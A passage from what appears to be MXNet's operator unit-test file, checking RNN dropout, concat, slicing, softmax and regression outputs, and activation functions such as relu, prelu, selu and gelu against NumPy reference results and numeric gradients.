Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
CX = mx.sym.Variable('state_cell')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX, state_cell=CX,
state_size=H, num_layers=5, mode='lstm', p=0.5, state_outputs=True, name='LSTM')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
def test_gru_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='gru', p=0.5, state_outputs=True, name='GRU')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
def test_rnntanh_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_tanh', p=0.5, state_outputs=True, name='RNN_TANH')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
def test_rnnrelu_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_relu', p=0.5, state_outputs=True, name='RNN_RELU')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
def test_RNN_float64():
if default_context().device_type == 'gpu':
return
sym = mx.sym.RNN(
mx.sym.Variable('in'),
mx.sym.Variable('par'),
mx.sym.Variable('s'),
state_size = (2),
num_layers = 1,
mode = 'rnn_tanh'
)
dtype = 'float64'
explicit_grad = {
'in': mx.nd.ones([2, 1, 2], dtype=dtype),
'par': mx.nd.ones([12], dtype=dtype),
's': mx.nd.ones([1, 1, 2], dtype=dtype)
}
args_grad = explicit_grad
grad_req = 'write'
ex = sym.bind(default_context(),
{
'in': mx.nd.ones([2, 1, 2], dtype=dtype),
'par': mx.nd.ones([12], dtype=dtype),
's': mx.nd.ones([1, 1, 2], dtype=dtype)
},
args_grad = args_grad,
grad_req = grad_req
)
ex.forward()
ex.outputs[0].wait_to_read()
def np_softmax(x, axis=-1, temperature=1.0):
x = x - np.max(x, axis=axis, keepdims=True)
x = np.exp(x/temperature)
x /= np.sum(x, axis=axis, keepdims=True)
return x
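# For example, np_softmax(np.array([1.0, 2.0, 3.0])) is approximately
# [0.0900, 0.2447, 0.6652]; a temperature above 1.0 flattens the distribution,
# while a temperature below 1.0 sharpens it.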
def check_elementwise_sum_with_shape(shape, n):
# forward
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.ElementWiseSum(*inputs, name='esum')
arr = [mx.nd.empty(shape) for i in range(n)]
arr_grad = [mx.nd.empty(shape) for i in range(n)]
for i in range(n):
arr[i][:] = np.random.uniform(-10, 10, shape)
exec1 = out.bind(default_context(),
args=arr,
args_grad=arr_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
out = sum(a.asnumpy() for a in arr)
assert_almost_equal(out, out1, rtol=1e-5, atol=1e-5)
out_grad = mx.nd.empty(shape)
out_grad[:] = np.random.uniform(-10, 10, shape)
# backward
exec1.backward([out_grad])
for a in arr_grad:
assert_almost_equal(a, out_grad, rtol=1e-5, atol=1e-5)
@with_seed()
def test_elementwise_sum():
nrepeat = 2
maxdim = 4
for repeat in range(nrepeat):
for dim in range(1, maxdim):
shape = tuple(np.random.randint(1, int(1000**(1.0/dim)), size=dim))
check_elementwise_sum_with_shape(shape, np.random.randint(1, 8))
def check_concat_with_shape(shapes, dimension, skip_second):
# if skip_second is True, second argument will not have gradient.
# it is to test #1130
n = len(shapes)
# forward
target_dim = 0
for shape in shapes:
target_dim += shape[dimension]
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.Concat(*inputs, name='conc',dim=dimension)
arr = [mx.nd.empty(shape) for shape in shapes]
for i in range(n):
arr[i][:] = shapes[i][dimension]
arr_np = [np.copy(narray.asnumpy()) for narray in arr]
arr_grad = [mx.nd.empty(shape) for shape in shapes]
dict_grad = {}
arg_names = out.list_arguments()
for name, g in zip(arg_names, arr_grad):
if not skip_second or name != 'arg1':
dict_grad[name] = g
args = out.list_arguments()
arg_shapes, out_shapes, aux_shapes = out.infer_shape(**dict(zip(args, shapes)))
out_grad = mx.nd.empty(out_shapes[0])
exec1 = out.bind(default_context(),
args=arr,
args_grad=dict_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
ret = np.concatenate([narray.asnumpy() for narray in arr], axis=dimension)
assert_almost_equal(out1, ret)
# backward
out1.copyto(out_grad)
out_grad[:] += 1
exec1.backward([out_grad])
for i, name in enumerate(arg_names):
if not skip_second or name != 'arg1':
grad = dict_grad[name]
np_grad = arr_np[i]
assert_almost_equal(grad, np_grad + 1)
@with_seed()
def test_concat():
for dimension in range(4):
n = 2
merge = [2, 3, 4, 5, 6]
a = 2
b = 3
c = 4
# test 2D
if dimension<2:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a))
elif dimension == 1:
shapes.append((a, merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 2, True)
check_concat_with_shape(shapes, dimension - 2, False)
#test 3D
if dimension<3:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a,b))
elif dimension ==1:
shapes.append((a,merge[i],b))
elif dimension ==2:
shapes.append((a,b,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 3, True)
check_concat_with_shape(shapes, dimension - 3, False)
# test 4D
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i],a,b,c))
elif dimension == 1:
shapes.append((a,merge[i],b,c))
elif dimension ==2:
shapes.append((a,b,merge[i],c))
elif dimension ==3:
shapes.append((a,b,c,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 4, True)
check_concat_with_shape(shapes, dimension - 4, False)
@with_seed()
def test_slice_channel():
def check_slice_channel(data_ndim, axis, num_outputs, squeeze_axis):
ins = []
if squeeze_axis:
shape = np.random.randint(2, 5, data_ndim).tolist()
shape[axis] = num_outputs
out_ele_shape = [ele for ele in shape]
del out_ele_shape[axis]
else:
shape = np.random.randint(1, 5, data_ndim).tolist()
shape[axis] *= num_outputs
out_ele_shape = [ele for ele in shape]
out_ele_shape[axis] //= num_outputs
data_npy = np.random.normal(size=shape)
out_grads_npy = [np.random.normal(size=out_ele_shape) for i in range(num_outputs)]
data = mx.sym.Variable('data')
sym = mx.sym.SliceChannel(data=data, num_outputs=num_outputs, axis=axis, squeeze_axis=squeeze_axis)
exe = sym.simple_bind(ctx=default_context(), data=data_npy.shape)
assert len(exe.outputs) == num_outputs
outputs = exe.forward(is_train=True, data=data_npy)
for i in range(num_outputs):
gt = data_npy.take(np.arange(i * shape[axis]/num_outputs,
(i+1) * shape[axis]/num_outputs).astype(np.int), axis=axis)
if squeeze_axis:
assert_almost_equal(outputs[i], gt.reshape(outputs[i].shape))
else:
assert_almost_equal(outputs[i], gt)
# test backward
exe.backward(out_grads=[mx.nd.array(ele, ctx=default_context()) for ele in out_grads_npy])
if squeeze_axis:
assert_almost_equal(exe.grad_arrays[0],
np.concatenate([np.expand_dims(ele, axis=axis) for ele in out_grads_npy],
axis=axis))
else:
assert_almost_equal(exe.grad_arrays[0],
np.concatenate(out_grads_npy, axis=axis))
check_slice_channel(data_ndim=2, axis=1, num_outputs=3, squeeze_axis=True)
check_slice_channel(data_ndim=4, axis=2, num_outputs=3, squeeze_axis=False)
check_slice_channel(data_ndim=3, axis=-1, num_outputs=2, squeeze_axis=False)
check_slice_channel(data_ndim=5, axis=-2, num_outputs=3, squeeze_axis=True)
@with_seed()
def test_regression():
''' test regression operator '''
def check_regression(symbol, forward, backward, shape, stype='default', densities=[0, 0.5, 1]):
# init executor
data = mx.symbol.Variable('data')
label = mx.symbol.Variable('label', stype=stype)
out = symbol(data, label)
grad_req = {'data': 'write', 'label': 'null'}
out_exec = out.simple_bind(default_context(), grad_req=grad_req,
data=shape, label=shape)
arg_map = dict(zip(out.list_arguments(), out_exec.arg_arrays))
grad_map = dict(zip(out.list_arguments(), out_exec.grad_arrays))
# init data
arr_data = mx.random.uniform(-1, 1, shape)
arg_map["data"][:] = arr_data
# init label based on density
arr_label = arg_map["label"]
atol = 1e-5
for density in densities:
arr_label[:] = rand_ndarray(shape, stype, density=density)
out_exec.forward(is_train=True)
out_exec.backward()
np_out = forward(arr_data.asnumpy())
out_grad = backward(np_out, arr_label.asnumpy().reshape(np_out.shape)) / shape[1]
assert_almost_equal(out_exec.outputs[0], np_out, atol=atol)
assert_almost_equal(grad_map["data"], out_grad, atol=atol)
shape = (50, 30)
check_regression(mx.symbol.LogisticRegressionOutput,
lambda x: 1.0 / (1.0 + np.exp(-x)),
lambda x, y : x - y,
shape)
check_regression(mx.symbol.LinearRegressionOutput,
lambda x: x,
lambda x, y : x - y,
shape)
check_regression(mx.symbol.MAERegressionOutput,
lambda x: x,
lambda x, y : np.where(x > y, np.ones(x.shape), -np.ones(x.shape)),
shape)
check_regression(mx.symbol.LogisticRegressionOutput,
lambda x: 1.0 / (1.0 + np.exp(-x)),
lambda x, y : x - y,
shape, stype='csr')
check_regression(mx.symbol.LinearRegressionOutput,
lambda x: x,
lambda x, y : x - y,
shape, stype='csr')
def check_softmax_grad(xpu):
x = mx.sym.Variable('x')
label = mx.sym.Variable('label')
x_nd = mx.nd.array([[1, 6, 4, 2]], ctx=xpu)
grad_x = mx.nd.zeros((1,4), ctx=xpu)
label_nd = mx.nd.array([1], ctx=xpu)
sym = mx.sym.SoftmaxOutput(data=x, label=label, ignore_label=0, use_ignore=False)
ex = sym.bind(ctx=xpu, args={'x': x_nd, 'label': label_nd}, args_grad={'x': grad_x})
ex.forward(is_train=True)
softmax_out = ex.outputs[0].asnumpy()
expected_softmax_out = [[0.005806628, 0.861780069, 0.116629249, 0.015784052]]
assert np.isclose(softmax_out, expected_softmax_out).all()
ex.backward(is_train=True)
grad_out = ex.grad_arrays[0].asnumpy()
k = int(label_nd[0].asscalar())
expected_grad_out = np.zeros((1,4))
expected_grad_out[0, k] = -1
assert np.isclose(grad_out - softmax_out, expected_grad_out).all()
def check_smoothed_softmax_grad(xpu):
alpha = 0.2
x = mx.sym.Variable('x')
label = mx.sym.Variable('label')
x_nd = mx.nd.array([[1, 6, 4, 2]], ctx=xpu)
grad_x = mx.nd.zeros((1,4), ctx=xpu)
label_nd = mx.nd.array([1], ctx=xpu)
sym = mx.sym.SoftmaxOutput(data=x, label=label, ignore_label=0, use_ignore=False, smooth_alpha=alpha)
ex = sym.bind(ctx=xpu, args={'x': x_nd, 'label': label_nd}, args_grad={'x': grad_x})
ex.forward(is_train=True)
softmax_out = ex.outputs[0].asnumpy()
expected_softmax_out = [[0.005806628, 0.861780069, 0.116629249, 0.015784052]]
assert np.isclose(softmax_out, expected_softmax_out).all()
ex.backward(is_train=True)
grad_out = ex.grad_arrays[0].asnumpy()
k = int(label_nd[0].asscalar())
expected_grad_out = np.full((1,4), fill_value=-alpha/float(4-1))
expected_grad_out[0, k] = - (1 - alpha)
assert np.isclose(grad_out - softmax_out, expected_grad_out).all()
def check_softmax_with_ignore_label(xpu):
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SoftmaxOutput(data=X, label=L, ignore_label=0, use_ignore=True)
shape = (20, 10)
x = mx.nd.empty(shape, ctx = xpu)
l = mx.nd.empty((shape[0],), ctx = xpu)
x_np = np.random.rand(*shape)
l_np = np.random.randint(0, shape[1]-1, (shape[0],))
x[:] = x_np
l[:] = l_np
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
exec1.backward()
grad0 = grad.asnumpy()
for i in range(int(shape[0]/2)):
l_np[i] = 0
l[:] = l_np
exec1.forward(is_train=True)
exec1.backward()
grad1 = grad.asnumpy()
assert abs(np.sum(grad1[:int(shape[0]/2)])) < 1e-5
assert_almost_equal(grad0[int(shape[0]/2):], grad1[int(shape[0]/2):])
def check_softmax_with_shape(shape, xpu, preserve_shape=False):
# bind with label
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SoftmaxOutput(data=X, label=L, preserve_shape=preserve_shape)
x = mx.random.uniform(-1, 1, shape, ctx=xpu)
l = mx.random.uniform(-1, 1, shape, ctx=xpu)
l[:] = np_softmax(l.asnumpy())
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
out = exec1.outputs[0].asnumpy()
# Non-zero atol required by test_softmax with seed 781663739
rtol = 1e-4
atol = 1e-6
assert_almost_equal(out, np_softmax(x.asnumpy()), rtol=rtol, atol=atol)
exec1.backward()
assert_almost_equal(grad, np_softmax(x.asnumpy()) - l.asnumpy(), rtol=rtol, atol=atol)
def test_python_op():
X = mx.symbol.Variable('X')
op = mx.operator.NumpyOp()
s = op.get_symbol(X, name='numpy_op')
x = mx.ndarray.ones((10))*10
dx = mx.ndarray.zeros((10))
dy = mx.ndarray.ones((10))
exec1 = s.bind(default_context(), args=[x], args_grad = {'X': dx})
exec1.forward(is_train=True)
assert_almost_equal(x, exec1.outputs[0])
exec1.backward(dy)
assert_almost_equal(dy, dx)
def test_swapaxes():
data = mx.symbol.Variable('data')
shape = (2, 3, 4)
data_tmp = np.ones(shape)
data_tmp[0] = 1
data_tmp[1] = 2
arr_data = mx.nd.array(data_tmp)
swap0 = mx.symbol.SwapAxis(data=data, dim1=0, dim2=2)
swap = mx.symbol.SwapAxis(data=swap0, dim1=1, dim2=2)
exe_c = swap.bind(default_context(), args=[arr_data])
exe_c.forward(is_train=True)
out = exe_c.outputs[0]
swap0_ = np.swapaxes(data_tmp, 0, 2)
swap_ = np.swapaxes(swap0_, 1, 2)
assert_almost_equal(out, swap_)
config = [((1, 1, 2), 0, 1),
((1, 1, 2), -1, -2),
((4, 5, 6, 7), 1, 1),
((4, 5, 6, 7), 2, 3),
((4, 5, 6, 7), -2, 2),
((4, 5, 6, 7), -2, -3)]
for shape, axis1, axis2 in config:
data_np = np.random.uniform(size=shape)
data_mx = mx.nd.array(data_np, dtype=data_np.dtype)
ret_np = np.swapaxes(data_np, axis1=axis1, axis2=axis2)
ret_mx = mx.symbol.SwapAxis(data, dim1=axis1, dim2=axis2)
exe_c = ret_mx.bind(default_context(), args=[data_mx])
exe_c.forward(is_train=True)
out = exe_c.outputs[0]
assert_almost_equal(out, ret_np)
@with_seed()
def test_scalarop():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)*5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = 2 / (4-((1+data+1)*2/5)-0.8-(data!=0))
npout_1 = (4-((1+data_tmp+1)*2/5)-0.8-(data_tmp!=0))
npout = 2/npout_1
check_symbolic_forward(test, [data_tmp], [npout])
npout_grad = 2.*2/5
npout_grad = 2*npout_grad /(npout_1 *npout_1 )
check_symbolic_backward(test, [data_tmp], [np.ones(shape)*2], [npout_grad])
@with_seed()
def test_scalar_pow():
data = mx.symbol.Variable('data')
shape = (1, 1)
data_tmp = np.ones(shape)
test = data ** 2
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [data_tmp ** 2])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)], [2 * data_tmp])
@with_seed()
def test_symbol_pow():
shape = (1, 1)
data = mx.symbol.Variable('data')
data_tmp = np.ones(shape)*2
exp = mx.symbol.Variable('exp')
exp_tmp = np.ones(shape)*3
test = data**exp
check_numeric_gradient(test, [data_tmp, exp_tmp])
check_symbolic_forward(test, [data_tmp, exp_tmp], [data_tmp**exp_tmp])
data_dir = data_tmp**(exp_tmp - 1) * exp_tmp
exp_dir = data_tmp**(exp_tmp) * np.log(data_tmp)
check_symbolic_backward(test, [data_tmp, exp_tmp], [np.ones(shape)], [data_dir, exp_dir])
@with_seed()
def test_fully_connected():
data = mx.sym.var("data")
fc_weight = mx.sym.var("weight")
fc_bias = mx.sym.var("bias")
fc = mx.sym.FullyConnected(data=data, weight=fc_weight, bias=fc_bias, num_hidden=10, no_bias=False, name='fc')
data = mx.nd.random.uniform(shape=(5, 5, 5, 13), dtype=np.float32)
fc_weight = mx.nd.random.uniform(shape=(10, 325), dtype=np.float32)
fc_bias = mx.nd.random.uniform(shape=(10), dtype=np.float32)
fc_bias2 = mx.nd.random.uniform(shape=(10, 1), dtype=np.float32)
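# FullyConnected flattens all trailing input dimensions, so the (5, 5, 5, 13)
# input behaves like a (5, 325) matrix; the manual reshape and np.dot below
# reproduce that reference result.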
data_np = data.asnumpy().reshape(5, 325)
fc_weight_np = np.transpose(fc_weight.asnumpy())
fc_bias_np = fc_bias.asnumpy()
res = np.dot(data_np, fc_weight_np) + fc_bias.asnumpy()
check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np}, {'fc_output': res})
check_numeric_gradient(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np},
numeric_eps=1e-2, rtol=1e-4, atol=1e-2)
# TODO: Fix Bug #15032 when bias has ndim > 1
#check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias2.asnumpy()}, {'fc_output': res})
@with_seed()
def test_pow_fn():
shape = (3, 4)
exp = mx.symbol.Variable("exp")
x = np.ones(shape)*3
for y in [mx.sym.pow(2, exp), mx.sym.power(2, exp)]:
check_numeric_gradient(y, [x], numeric_eps=1E-3)
check_symbolic_forward(y, [x], [2**x])
check_symbolic_backward(y, [x], [np.ones(shape)], [np.log(2) * 2**x])
@with_seed()
def test_relu():
def frelu(x):
return np.maximum(x, 0.0)
def frelu_grad(x):
return 1.0 * (x > 0.0)
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.relu(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
eps = 1e-4
# Avoid finite difference method inaccuracies due to discontinuous gradient at the origin.
# Here we replace small problematic inputs with 1.0. Repro issue with seed 97264195.
xa[abs(xa) < eps] = 1.0
ya = frelu(xa)
ga = frelu_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=eps)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga])
# NOTE(haojin2): The numeric gradient checks are skipped for the float16 data type due to precision issues;
# the analytical checks are still performed on each and every data type to verify the correctness.
@with_seed()
def test_leaky_relu():
def fleaky_relu(x, act_type, slope=0.25):
neg_indices = x < 0
out = x.copy()
if act_type == 'elu':
out[neg_indices] = slope * np.expm1(out[neg_indices])
elif act_type == 'leaky':
out[neg_indices] = slope * out[neg_indices]
return out
def fleaky_relu_grad(grad, x, y, act_type, slope=0.25):
neg_indices = x < 0
out = np.ones(x.shape)
if act_type == 'elu':
out[neg_indices] = y[neg_indices] + slope
elif act_type == 'leaky':
out[neg_indices] = slope
return out * grad
for ndim in range(1, 4):
shape = rand_shape_nd(ndim)
x = mx.symbol.Variable("x")
slp = 0.25
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
eps = 1e-4
rtol = 1e-2
atol = 1e-3
xa[abs(xa) < eps] = 1.0
for act_type in ['elu', 'leaky']:
y = mx.symbol.LeakyReLU(data=x, slope=slp, act_type=act_type)
ya = fleaky_relu(xa, slope=slp, act_type=act_type)
ga = fleaky_relu_grad(np.ones(shape), xa, ya, slope=slp, act_type=act_type)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
# NOTE(haojin2): The numeric gradient checks are skipped for the float16 data type due to precision issues;
# the analytical checks are still performed on each and every data type to verify the correctness.
@with_seed()
def test_prelu():
def fprelu(x, gamma):
pos_indices = x > 0
out = x.copy()
if len(x.shape) == 4:
out = out.transpose(2,3,0,1)
out = np.multiply(out, gamma)
out = out.transpose(2,3,0,1)
else:
out = np.multiply(out, gamma)
out[pos_indices] = x[pos_indices]
return out
def fprelu_grad(x, y, gamma):
pos_indices = x > 0
if len(x.shape) == 4:
grad_x = np.multiply(np.ones(x.shape).transpose(2,3,0,1), gamma)
grad_x = grad_x.transpose(2,3,0,1)
else:
grad_x = np.multiply(np.ones(x.shape), gamma)
grad_gam = np.zeros(gamma.shape)
copy_x = x.copy()
copy_x[pos_indices] = 0.0
grad_x[pos_indices] = 1.0
if len(gamma.shape) > 1 and len(x.shape) != 4:
grad_gam = copy_x
elif len(gamma.shape) > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(2,3))
elif gamma.shape[0] == 1:
grad_gam = np.sum(np.sum(copy_x))
elif gamma.shape[0] > 1 and len(x.shape) != 4:
grad_gam = np.sum(copy_x, axis=0)
elif gamma.shape[0] > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(0,2,3))
return (grad_x, grad_gam)
x = mx.symbol.Variable("x")
gamma = mx.symbol.Variable("gamma")
for shape in [(3,4), (3,4,4,5)]:
for dtype in [np.float16, np.float32, np.float64]:
for gam in [np.array([0.1, 0.2, 0.3, 0.4], dtype=dtype)]:
gam_full = np.array([gam, gam, gam])
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
rtol = 1e-2
atol = 1e-3
eps = 1e-4
xa[abs(xa) < eps] = 1.0
y = mx.symbol.LeakyReLU(data=x, gamma=gamma, act_type='prelu')
ya = fprelu(xa, gam)
ya_full = fprelu(xa, gam_full)
g_xa, g_gam = fprelu_grad(xa, ya, gamma=gam)
g_xa_full, g_gam_full = fprelu_grad(xa, ya_full, gamma=gam_full)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa, gam], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_numeric_gradient(y, [xa, gam_full], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam], [np.ones(shape), np.ones(gam.shape)], [g_xa, g_gam], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam_full], [ya_full], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam_full], [np.ones(shape), np.ones(gam_full.shape)],
[g_xa_full, g_gam_full], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_selu():
alpha = 1.6732632423543772848170429916717
lamb = 1.0507009873554804934193349852946
def fselu(x):
neg_indices = x < 0
out = x.copy()
out[neg_indices] = alpha * np.expm1(out[neg_indices])
return out * lamb
def fselu_grad(grad, x, y):
neg_indices = x < 0
out = np.ones(x.shape).astype(x.dtype)
out[neg_indices] = y[neg_indices] + alpha
return out * lamb
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="selu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 1e-1, 1e-2) if dtype is np.float16 else (1e-4, 1e-2, 1e-4)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fselu(xa)
ga = fselu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_gelu():
CUBE_CONSTANT = 0.044715
ROOT_TWO_OVER_PI = 0.7978845608028654
def g(x):
return ROOT_TWO_OVER_PI * (x + CUBE_CONSTANT * np.power(x, 3))
def g_grad(x):
return ROOT_TWO_OVER_PI * (1.0 + 3.0 * CUBE_CONSTANT * np.power(x, 2))
def f(x):
return 1.0 + np.tanh(g(x))
def f_grad(x):
return (1.0 - np.tanh(g(x)) * np.tanh(g(x))) * g_grad(x)
def fgelu(x):
return 0.5 * x * f(x)
def fgelu_grad(grad, x, y):
return grad * (y / x + y * (1 - np.tanh(g(x))) * g_grad(x))
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="gelu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 2e-2, 1e-3) if dtype is np.float16 else (1e-4, 1e-3, 1e-5)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fgelu(xa)
ga = fgelu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_sigmoid():
def fsigmoid(a):
return np.divide(1.0, (1.0 + np.exp(-a)))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.sigmoid(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsigmoid(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya * (1 - ya)])
@with_seed()
def test_shape_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.shape_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.shape(xa)
yg = mx.nd.ones(ya)
exe = y.bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg, np.zeros_like(xg.asnumpy()))
@with_seed()
def test_size_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.size_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.size(xa)
yg = mx.nd.ones(ya)
exe = y.bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg, np.zeros_like(xg.asnumpy()))
@with_seed()
def test_hard_sigmoid():
def fhardsigmoid(a, alpha=0.2, beta=0.5):
return np.maximum(np.zeros(a.shape, dtype=a.dtype),
np.minimum(np.ones(a.shape, dtype=a.dtype), alpha*a+beta))
def fhardsigmoid_grad(a, out_grad, alpha=0.2, beta=0.5):
orig_out = fhardsigmoid(a, alpha, beta)
res = out_grad * alpha
res[orig_out <= 0.0] = 0.0
res[orig_out >= 1.0] = 0.0
return res
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.hard_sigmoid(x)
for dtype in [np.float16, np.float32, np.float64]:
if dtype is np.float16:
rtol = 1e-2
else:
rtol = 1e-3
atol = 1e-3
eps = 1e-3
xa = np.random.uniform(low=-3.0,high=3.0,size=shape).astype(dtype)
# function not differentiable at x=2.5 and -2.5
xa[abs(xa-2.5) < eps] -= 2 * eps
xa[abs(xa+2.5) < eps] += 2 * eps
ya = fhardsigmoid(xa)
grad_xa = fhardsigmoid_grad(xa, np.ones(shape))
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [grad_xa], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_softsign():
def fsoftsign(a):
return np.divide(a, (1.0 + np.abs(a)))
def fsoftsign_grad(a):
return np.divide(1.0, np.square((1.0 + np.abs(a))))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.softsign(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsoftsign(xa)
ya_grad = fsoftsign_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya_grad])
@with_seed()
def test_binary_logic():
def _inner_test(forward_gt, logic_sym, x_shape, y_shape, test_scalar=True):
x = mx.symbol.Variable("x")
y = mx.symbol.Variable("y")
z = logic_sym(x, y)
x_npy = np.random.randint(0, 4, size=x_shape).astype(np.float32)
